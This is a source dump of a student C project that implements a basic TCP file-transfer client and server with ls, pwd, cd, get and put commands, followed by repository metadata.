if (!dir)
{
if ((s = ft_no_dir(envy)) == NULL)
return (envy);
}
else if (dir[0] == '~')
{
if ((s = ft_cd_home(dir, envy)) == NULL)
return (envy);
}
else if (dir[0] == '/')
s = ft_strdup(dir);
else
{
if ((s = ft_else(cwd, dir, envy)) == NULL)
return (envy);
}
envy = ft_end_cd(dir, s, cwd, envy);
return (envy);
}
<file_sep>/inc/ftp.h
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* ftp.h :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: mceccato <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2015/05/08 16:47:51 by mceccato #+# #+# */
/* Updated: 2015/07/01 18:52:45 by mceccato ### ########.fr */
/* */
/* ************************************************************************** */
#ifndef FTP_H
# define FTP_H
# include <unistd.h>
# include <fcntl.h>
# include <stdlib.h>
# include <sys/socket.h>
# include <netinet/in.h>
# include <arpa/inet.h>
# include <netdb.h>
# include <stdio.h>
# include <signal.h>
# include <sys/stat.h>
# include "libft.h"
# define KO -1
# define OK 1
# define PROMPT "\033[34;1mft_p > \033[0m"
# define WELCOME "\033[34;1;4mWelcome on this server !\033[0m\n"
# define ERROR "\033[31mERROR\n\n\033[0m"
# define SUCCESS "\033[32mSUCCESS\n\n\033[0m"
typedef struct s_server
{
int port;
int sock;
int ret;
int cs;
int state;
unsigned int cslen;
struct sockaddr_in csin;
char buff[3000];
char *line;
char **split_line;
char **envy;
} t_server;
typedef struct s_client
{
int port;
int sock;
int ret;
int rbyte;
int sock_len;
char buff[3000];
char *error;
char *line;
char **split_line;
} t_client;
/*
** serveur.c
*/
void	free_arr2d(char **arr);
/*
** exec.c
*/
void exec_ls(t_server *serv);
void exec_pwd(t_server *serv);
/*
** cd.c
*/
char **ft_cd(char *dir, char **envy);
/*
** features_cd.c
*/
char **ft_pwd(char *cwd, char **envy);
char **ft_oldpwd(char *cwd, char **envy);
char *ft_cd_oldpwd(char **envy);
char *ft_get_home(char **envy);
void ft_error_cd(char *s, char *dir);
/*
** set_env.c
*/
char **ft_set_env(char **envy, char *line);
/*
** unset_env.c
*/
char **ft_unset_env(char **envy, char *line);
/*
** transfer.c
*/
void ft_get(t_server *serv);
void ft_put(t_server *serv);
/*
** put_file.c
*/
void send_back(t_client *client);
void my_put(t_client client);
/*
** client_suite.c
*/
void kill_process(int i);
void usage(char *s);
int create_client(char *addre, int port);
void change_tab(char *line);
void free_arr2d(char **arr);
/*
** serveur_suite.c
*/
void free_arr2d(char **arr);
void usage(char *s);
int create_server(int port);
void change_tab(char *line);
void read_commands(t_server *serv);
#endif
<file_sep>/src/client.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* client.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: mceccato <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2015/05/08 17:52:08 by mceccato #+# #+# */
/* Updated: 2015/07/01 16:08:41 by mceccato ### ########.fr */
/* */
/* ************************************************************************** */
#include "ftp.h"
void write_file(int fd, int size, char *reply)
{
int i;
i = 0;
while (i < size)
{
write(fd, &reply[i], 1);
i++;
}
}
void get_back(int sock, char *name)
{
int fd;
char reply[3001];
int size;
fd = open(name, O_CREAT | O_WRONLY, S_IRWXU | S_IRWXG | S_IRWXO);
while (42)
{
ft_bzero(reply, 3000);
recv(sock, reply, 3000, 0);
size = ft_atoi(reply);
send(sock, "size", 4, 0);
if (size == 0)
{
recv(sock, reply, 3000, 0);
ft_putstr(reply);
send(sock, "end get", 7, 0);
close(fd);
return ;
}
ft_bzero(reply, 3000);
recv(sock, reply, 3000, 0);
send(sock, "file", 4, 0);
write_file(fd, size, reply);
}
}
void reading_back(t_client client)
{
char reply[30001];
while (42)
{
ft_bzero(reply, 30001);
recv(client.sock, reply, 30000, 0);
if (ft_strcmp(reply, "get") == 0)
{
send(client.sock, "get", 3, 0);
get_back(client.sock, client.split_line[1]);
return ;
}
else if (ft_strcmp(reply, "put") == 0)
{
my_put(client);
return ;
}
ft_putstr(reply);
if (ft_strstr(reply, ERROR) != NULL ||
ft_strstr(reply, SUCCESS) != NULL)
{
send(client.sock, "ty", 2, 0);
return ;
}
}
}
void boucle(t_client client)
{
int ret;
char buff[3001];
while (42)
{
ft_putstr(PROMPT);
ft_bzero(buff, 3001);
ret = read(0, buff, 3000);
buff[ret] = '\0';
if (ft_strcmp(buff, "quit\n") == 0)
{
close(client.sock);
ft_putendl("Disconnected.");
exit(OK);
}
change_tab(buff);
client.split_line = ft_strsplit(buff, ' ');
if (client.split_line[0] == NULL)
return ;
send(client.sock, buff, ft_strlen(buff), 0);
reading_back(client);
}
}
int main(int ac, char **av)
{
t_client client;
if (ac != 3)
usage(av[0]);
client.port = ft_atoi(av[2]);
client.sock = create_client(av[1], client.port);
signal(2, kill_process);
while (42)
boucle(client);
close(client.sock);
return (0);
}
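/*
** Invocation sketch (the address and port are placeholders):
** ./client 127.0.0.1 4242
*/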
<file_sep>/src/transfer.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* transfer.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: mceccato <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2015/06/30 23:46:58 by mceccato #+# #+# */
/* Updated: 2015/06/30 23:49:35 by mceccato ### ########.fr */
/* */
/* ************************************************************************** */
#include "ftp.h"
/*
** receiving the file ------- SERVER ----------
*/
void write_file(int fd, int size, char *reply)
{
int i;
i = 0;
while (i < size)
{
write(fd, &reply[i], 1);
i++;
}
}
void lecture(t_server *serv)
{
int fd;
char reply[3001];
int size;
fd = open(serv->split_line[1], O_CREAT | O_WRONLY,
S_IRWXU | S_IRWXG | S_IRWXO);
while (42)
{
ft_bzero(reply, 3000);
send(serv->cs, "size", 4, 0);
recv(serv->cs, reply, 3000, 0);
size = ft_atoi(reply);
if (size == 0)
{
close(fd);
return ;
}
ft_bzero(reply, 3000);
send(serv->cs, "file", 4, 0);
recv(serv->cs, reply, 3000, 0);
write_file(fd, size, reply);
}
}
void ft_put(t_server *serv)
{
char buf[3000];
ft_bzero(buf, 3000);
send(serv->cs, "put", 3, 0);
recv(serv->cs, buf, 3000, 0);
ft_bzero(buf, 3000);
send(serv->cs, "state", 5, 0);
recv(serv->cs, buf, 3000, 0);
if (ft_strcmp(buf, "ko") == 0)
{
serv->state = KO;
return ;
}
else
{
serv->state = OK;
lecture(serv);
}
}
void send_file(t_server *serv, int fd)
{
char file[3000];
char rec[3000];
serv->state = OK;
send(serv->cs, "get", 6, 0);
recv(serv->cs, rec, 3000, 0);
while ((serv->ret = read(fd, file, 3000)) > 0)
{
		send(serv->cs, ft_itoa(serv->ret), 4, 0);
recv(serv->cs, rec, 3000, 0);
if (serv->ret != 0)
{
send(serv->cs, file, serv->ret, 0);
recv(serv->cs, rec, 3000, 0);
ft_bzero(file, 3000);
}
}
send(serv->cs, "end get", 7, 0);
recv(serv->cs, rec, 3000, 0);
}
void ft_get(t_server *serv)
{
int fd;
if (!serv->split_line[1])
{
ft_putendl("Usage: get <file>");
return ;
}
if ((fd = open(serv->split_line[1], O_RDONLY)) == -1)
{
ft_putendl("File not found");
close(fd);
return ;
}
send_file(serv, fd);
close(fd);
}
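/*
** Transfer protocol as inferred from the code above (there is no external
** spec): each chunk is announced with its byte count sent as an ascii
** integer, every send is answered by a short handshake recv, and a count
** that parses to 0 (including the final "end get" message) marks the end
** of the file.
*/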
<file_sep>/src/serveur_suite.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* serveur_suite.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: mceccato <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2015/07/01 18:50:05 by mceccato #+# #+# */
/* Updated: 2015/07/01 18:51:01 by mceccato ### ########.fr */
/* */
/* ************************************************************************** */
#include "ftp.h"
void free_arr2d(char **arr)
{
int i;
i = 0;
if (!arr)
return ;
while (arr[i] != NULL)
{
free(arr[i]);
arr[i] = NULL;
i++;
}
free(arr);
arr = NULL;
}
void usage(char *s)
{
ft_putstr("Usage: ");
ft_putstr(s);
ft_putendl(" <port>");
exit(KO);
}
int create_server(int port)
{
int sock;
struct protoent *proto;
struct sockaddr_in sin;
proto = getprotobyname("tcp");
if (proto == 0)
return (KO);
sock = socket(PF_INET, SOCK_STREAM, proto->p_proto);
sin.sin_family = AF_INET;
sin.sin_port = htons(port);
sin.sin_addr.s_addr = htonl(INADDR_ANY);
if (bind(sock, (const struct sockaddr *)&sin, sizeof(sin)) == -1)
{
ft_putendl_fd("Bind error", 2);
exit(KO);
}
listen(sock, 42);
return (sock);
}
void change_tab(char *line)
{
int i;
i = 0;
while (line[i] != '\0')
{
if (line[i] == '\t' || line[i] == '\n')
line[i] = ' ';
i++;
}
}
void read_commands(t_server *serv)
{
if (ft_strcmp(serv->split_line[0], "ls") == 0)
exec_ls(serv);
else if (ft_strcmp(serv->split_line[0], "pwd") == 0)
exec_pwd(serv);
else if (ft_strcmp(serv->split_line[0], "cd") == 0)
{
serv->state = OK;
serv->envy = ft_cd(serv->split_line[1], serv->envy);
}
else if (ft_strcmp(serv->split_line[0], "get") == 0)
ft_get(serv);
else if (ft_strcmp(serv->split_line[0], "put") == 0)
ft_put(serv);
else
ft_putendl("Command not found");
}
|
62f31b9afa7c649e90d4f509eb5c1557a131273d
|
[
"C",
"Makefile"
] | 12
|
C
|
Lumpouille/FTP
|
589096384f4c5c844b42c2dac97548e165bc2c32
|
63c9816a082a76a7f97ddd246f759dbf52b00cf3
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.